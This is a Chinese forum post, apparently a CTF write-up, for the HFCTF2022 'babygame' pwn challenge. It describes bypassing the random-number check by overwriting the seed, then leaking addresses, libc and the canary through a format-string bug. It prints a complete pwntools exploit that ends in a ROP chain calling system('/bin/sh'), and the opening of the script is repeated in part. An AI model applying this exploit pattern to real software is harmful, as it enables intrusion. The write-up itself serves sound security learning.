-
-
[原创]【HFCTF2022】babygame
-
发表于: 2022-4-28 18:28 13612
-
(1)调用函数和被调用函数的canary的值是一样的
(2)fmt需要事先在栈上设置修改位置
从栈帧中可以看出srand的seed———v5是可以被我们覆盖而修改的,那么我们可以外接linux(windows和linux对同样的seed跑出的随机不太一样)上跑好的随机数达到绕过随机数检测的目的
不仅如此,栈上还放了一些残留的进程,我们可以利用这个来leak进程的基地址
简单的绕过随机数,攻防世界的入门题了属于是
明显的字符串格式化漏洞,可以用它泄露libc,canary和fmt修改栈上内容(返回地址啥的)
通过金手指泄露libc和canary,同时fmt修改返回地址为main函数,然后main函数里面填补canary的同时栈溢出进行rop
#encoding: utf-8 2
#!/usr/bin/python
import
sys
from
pwn
import
*
from
LibcSearcher
import
*
from
pwnlib.util.iters
import
mbruteforce
from
hashlib
import
sha256
import
base64
context.log_level
=
'debug'
context.arch
=
'amd64'
context.os
=
'linux'
def
proof_of_work(sh):
sh.recvuntil(
" == "
)
cipher
=
sh.recvline().strip().decode(
"utf8"
)
proof
=
mbruteforce(
lambda
x: sha256((x).encode()).hexdigest()
=
=
cipher, string.ascii_letters
+
string.digits, length
=
4
, method
=
'fixed'
)
sh.sendlineafter(
"input your ????>"
, proof)
def
z():
gdb.attach(r)
r
=
process(
'./babygame'
)
libc
=
ELF(
'./libc-2.31.so'
)
##leak_proc_base
pd
=
0x108
*
'a'
+
0x30
*
'a'
+
'nameless'
+
'nameless'
r.sendafter(
"Please input your name:"
,pd)
r.recvuntil(
'namelessnameless'
)
elfbase
=
u64(r.recv(
6
).ljust(
8
,
'\x00'
))
-
0x1465
log.info(
'elfbase:'
+
hex
(elfbase))
##set
read_addr
=
elfbase
+
0x14B6
##dao_ru_random
f
=
open
(
'test'
,
'r'
)
a
=
[
'0'
]
*
100
for
i
in
range
(
0
,
100
):
line
=
f.readline()
line
=
line[:
-
1
]
a[i]
=
str
(line)
f.close()
count
=
1
for
i
in
range
(
0
,
100
):
r.recvuntil(
'round '
+
str
(count))
if
a[i]
=
=
'1'
:
r.sendline(
'2'
)
if
a[i]
=
=
'2'
:
r.sendline(
'0'
)
if
a[i]
=
=
'0'
:
r.sendline(
'1'
)
count
=
count
+
1
##golden_finger
pd
=
'%27$p%35$p'
pd
+
=
'%{}c%11$hn'
.
format
((read_addr &
0xffff
)
-
32
)
pd
=
pd.ljust(
0x28
,
'\x00'
)
+
'\x68'
r.sendafter(
"Good luck to you.\n"
,pd)
libcbase
=
int
(r.recv(
14
),
16
)
-
(libc.sym[
'atoi'
]
+
20
)
canary
=
int
(r.recv(
18
),
16
)
log.success(
'libcbase:'
+
hex
(libcbase))
log.success(
'canary:'
+
hex
(canary))
log.success(
'read_addr:'
+
hex
(read_addr))
##set
system
=
libcbase
+
libc.sym[
'system'
]
pdt
=
libcbase
+
0x23b72
##pop_rdi_ret
ret
=
libcbase
+
0x22679
bin_sh
=
libcbase
+
libc.search(
'/bin/sh\x00'
).
next
()
rop
=
p64(pdt)
+
p64(bin_sh)
+
p64(ret)
+
p64(system)
pd
=
(
0x120
-
0x18
)
*
'a'
+
p64(canary)
+
0x18
*
'a'
+
rop
##z()
r.sendafter(
"Please input your name:"
,pd)
r.sendlineafter(
'round'
,
str
(
1
))
r.interactive()
#encoding: utf-8 2
#!/usr/bin/python
import
sys
from
pwn
import
*
from
LibcSearcher
import
*
from
pwnlib.util.iters
import
mbruteforce
from
hashlib
import
sha256
import
base64
context.log_level
=
'debug'
context.arch
=
'amd64'
context.os
=
'linux'
def
proof_of_work(sh):
sh.recvuntil(
" == "
)
cipher
=
sh.recvline().strip().decode(
"utf8"
)
proof
=
mbruteforce(
lambda
x: sha256((x).encode()).hexdigest()
=
=
cipher, string.ascii_letters
+
string.digits, length
=
4
, method
=
'fixed'
)
sh.sendlineafter(
"input your ????>"
, proof)
def
z():
gdb.attach(r)
r
=
process(
'./babygame'
)
libc
=
ELF(
'./libc-2.31.so'
)
##leak_proc_base
pd
=
0x108
*
'a'
+
0x30
*
'a'
+
'nameless'
+
'nameless'
r.sendafter(
"Please input your name:"
,pd)
r.recvuntil(
'namelessnameless'
)
elfbase
=
u64(r.recv(
6
).ljust(
8
,
'\x00'
))
-
0x1465
log.info(
'elfbase:'
+
hex
(elfbase))
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
赞赏
他的文章
- 西湖论剑2024 IOT赛后复盘及mqtt rce详解 14710
- 对某嵌入式设备声波配网的研究 12069
- DAS10月月赛PWN出题心路&&CVE-2023-40930的介绍 11474
- [原创]关于Nokelock蓝牙锁破解分析 22124
- [原创]基于树莓派的蓝牙调试环境搭建 24613
谁下载
看原图
赞赏
雪币:
留言: